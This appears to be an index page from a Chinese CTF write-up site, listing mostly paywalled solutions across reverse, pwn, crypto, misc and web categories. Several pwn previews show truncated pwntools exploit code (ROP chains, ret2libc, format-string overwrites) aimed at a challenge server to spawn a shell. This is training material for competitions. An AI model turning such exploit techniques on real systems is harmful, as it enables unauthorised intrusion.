-
patch_call wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- Reverse
- 3月前
-
入门题_WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- Reverse
- 3月前
-
[DownUnderCTF2024]co2
题目描述:一群喜欢"打破传统"做事的学生搭了一个网络安全博客站。你被雇佣对他们的网络应用进行深入的白盒测试。附件下载下来开始审计这里找到一个flag相关的函数,深入搜索发现变量flag没给用户赋值的机会,,,!routes.py!↓@app.route("/save_feedback",methods=["POST"])@login_requireddefsave_feedback():data=...
- WEB
- 3月前
-
入门题
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- Reverse
- 3月前
-
EzWinner
frompwnimport*fromLibcSearcherimport*host='49.232.142.230'port=14187p=remote(host,port)elf=ELF("./pwn")rop=ROP(elf)p.recvuntil('wisely:')win=int(p.recv(14),16)success('win=%#x',win)main_addr=win-0x128...
- PWN
- 3月前
-
S3 AWD排位赛-13
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
10 金币
- AWD
- 3月前
-
Bugku S3 AWD排位赛-13
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
10 金币
- AWD
- 3月前
-
[moeCTF2020]easy木大定理
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 3月前
-
【鹤城杯2021】easy_crypto
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 4月前
-
Ez Vigenere
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 4月前
-
idekCTF-pyjail-revenge
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 4月前
-
idekCTF-pyjail
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 4月前
-
bird
下载完附件后直接解压,没有密码,里面是个docx文档。打开后可以看到这串鸟的图片应该就是密码。通过网络搜索或随波逐流可以找到密码来源birdsonawire。照着密码表一一对照可以得到flag{birdislovely}。
- Crypto
- 4月前
-
ret2libc
frompwnimport*host='49.232.142.230'port=10930p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')libc=ELF('./libc.so.6')main=elf.sym['main']rop=ROP(elf)rdi=rop.find_gadget(['poprdi']).addressre...
- PWN
- 4月前
-
rop64
frompwnimport*host='49.232.142.230'port=14014p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')rop=ROP(elf)offset=0x30-0x8rdi=rop.find_gadget(['poprdi','ret']).addressbinsh=next(elf.search('/...
- PWN
- 4月前
-
ret2text
frompwnimport*host='49.232.142.230'port=16954p=remote(host,port)elf=ELF('./pwn2')rop=ROP(elf)ret=rop.find_gadget(['ret']).addressshell=elf.sym['foo']p.recvuntil('exactly!\n')payload=b'a'*(0x70+0x8)+p6...
- PWN
- 4月前
-
rop32
frompwnimport*host='49.232.142.230'port=11277p=remote(host,port)p.recvuntil('Go!!!\n')elf=ELF('./pwn')binsh=next(elf.search('/bin/sh'))payload=b'a'*(0x1c+0x4)+p32(0x80491E7)+p32(binsh)p.sendline(paylo...
- PWN
- 4月前
-
babyfmt
frompwnimport*host='49.232.142.230'port=17264p=remote(host,port)context(arch='i386',log_level='debug',os='linux')elf=ELF("./pwn")key=elf.sym['backdoor']got=elf.got['read']payload=fmtstr_payload(11,{go...
- PWN
- 4月前
-
21年羊城杯签到
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 4月前
-
Marco
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- Reverse
- 4月前
